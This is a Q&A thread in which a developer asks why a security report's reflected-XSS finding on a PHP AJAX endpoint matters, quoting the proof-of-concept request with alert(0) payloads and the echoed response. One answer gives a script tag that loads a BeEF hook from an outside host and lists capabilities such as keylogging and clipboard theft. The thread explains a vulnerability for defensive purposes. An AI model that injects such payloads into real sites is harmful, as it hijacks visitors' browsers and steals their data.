GET with additional parameters leads to "code injection" in html displayed

Question

We got a security review done of our PHP code and the security company sent this in their report:

Request

GET /appdir/ajax/addAvail.php?counter=1216%3cscript%3ealert(0)%3c%2fscript%3e&from=1216%3cscript%3ealert(0)%3c%2fscript%3e&to=1216%3cscript%3ealert(0)%3c%2fscript%3e&day=1216%3cscript%3ealert(0)%3c%2fscript%3e&parentDiv=1216%3cscript%3ealert(0)%3c%2fscript%3e&type=1216%3cscript%3ealert(0)%3c%2fscript%3e&date=1216%3cscript%3ealert(0)%3c%2fscript%3e&showdate=1216%3cscript%3ealert(0)%3c%2fscript%3e
HTTP/1.1 
Host: localhost 
Proxy-Connection: keep-alive 
User-Agent: x 
Content-Length: 0 
Cache-Control: max-age=0 
Origin: null 
Accept: text/html 
Accept-Language: en-US,en;q=0.8 
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 

Response

HTTP/1.1 200 OK 
Date: Fri, 17 Dec 2010 00:46:48 GMT 
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 
X-Powered-By: PHP/5.3.1 
Set-Cookie: PHPSESSID=q832q9c0ftdsat8r55dg32taf7; path=/ 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Pragma: no-cache 
Content-Length: 928 
Content-Type: text/html 
<div class="time_row" id="days_time_container1216<script>alert(0)</script>"> 
<div class="day_holder">1216<script>alert(0)</script></div> 
<div class="time_holder">1216<script>alert(0)</script> <span>-</span> 1216<script>alert(0)</script></div> 
<div class="button_holder"><a href="javascript:void(0);" onClick="removeElement('1216<script>alert(0)</script>','days_time_container1216<script>alert(0)</script>','decrementDays')" class="link4">Remove</a></div> 
<div class="clear"></div> 
<input type="hidden" id="hday1216<script>alert(0)</script>" name="hday1216<script>alert(0)</script>" value="1216<script>alert(0)</script>"> 

<input type="hidden" id="hfrom11216<script>alert(0)</script>" name="hfrom11216<script>alert(0)</script>" value="1216<script>alert(0)</script>"> 
<input type="hidden" id="hto11216<script>alert(0)</script>" name="hto11216<script>alert(0)</script>" value="1216<script>alert(0)</script>"> 
</div>

---

If I directly access the script through FireFox (headers reported by FireBug)

/appdir/ajax/addAvail.php

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 03:30:54 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache, no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 253
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<div class="time_row" id="days_time_container">
<div class="day_holder"></div>
<div class="time_holder">   <span>-</span>   </div>
<div class="button_holder"><a href="javascript:void(0);" onClick="removeElement('','days_time_container','decrementDays')" class="link4">Remove</a></div>
<div class="clear"></div>
<input type="hidden" id="hday" name="hday" value="">

<input type="hidden" id="hfrom1" name="hfrom1" value="">
<input type="hidden" id="hto1" name="hto1" value="">
</div>

I'm trying to understand why this might be problematic. I will, of course, ask the security company, but I'm also trying to evaluate them and see what the community has to say before they give me some roundabout answer.

Also, this is related to Security review: "HTTP header user-agent has been set to (something)" in the sense that both these issues were identified in the same report.

Answer 1

XSS can be very dangerous in many ways.

For example if I inject the following bit of XSS into your code, all clients viewing this code with Javascript enabled would become a zombie in my BEEF-Framework(Browser Exploitation Framework):

<script src='http://10.0.0.100/beef/hook/beefmagic.js.php'></script>

Once anyone browse a page with that script inclusion in it, the framework automatically lets me know and basically lets me very easily choose between a toolbox of nasty stuff. To name some, which all can be set to autorun when new zombie registers:

• Browser exploitation modules (even integrated with Metasploit)
• Metasploit autopwn (yepp.. one click one pwn)
• Port scanning LAN
• Tor detection
• Keylogging
• See what the user sees functionality
• Visited pages bruteforcing
• Clipboard theft
• Detect plugins

XSS can indeed be very dangerous!

UPDATE: In your specific situation it looks to me like your looking at a non persistent XSS vulnerability. This means that in order for this exploit to affect other users, the attackers would have to distribute the URL to unsuspecting victims for them to load it. This is however not an uncommon sight.

Answer 2

This is a classic XSS vulnerability. The danger here is that outside attacker could inject random code into the page. If this page displays in an elevated privilege context, it essentially is equal to the attacker having control over the user's browser when accessing this page, thus the attacker will be able to perform any action that the user is able to perform. For example, if it's an e-commerce site, the attacker would be able to simulate the user buying something, even if the user did not intend to buy anything. You can imagine how bad it can be.

Since there are many ways to direct somebody to load certain URL - both open ("click this link to get tons of free stuff!") and covert (hidden frames, etc.) - having such thing on the site is very dangerous.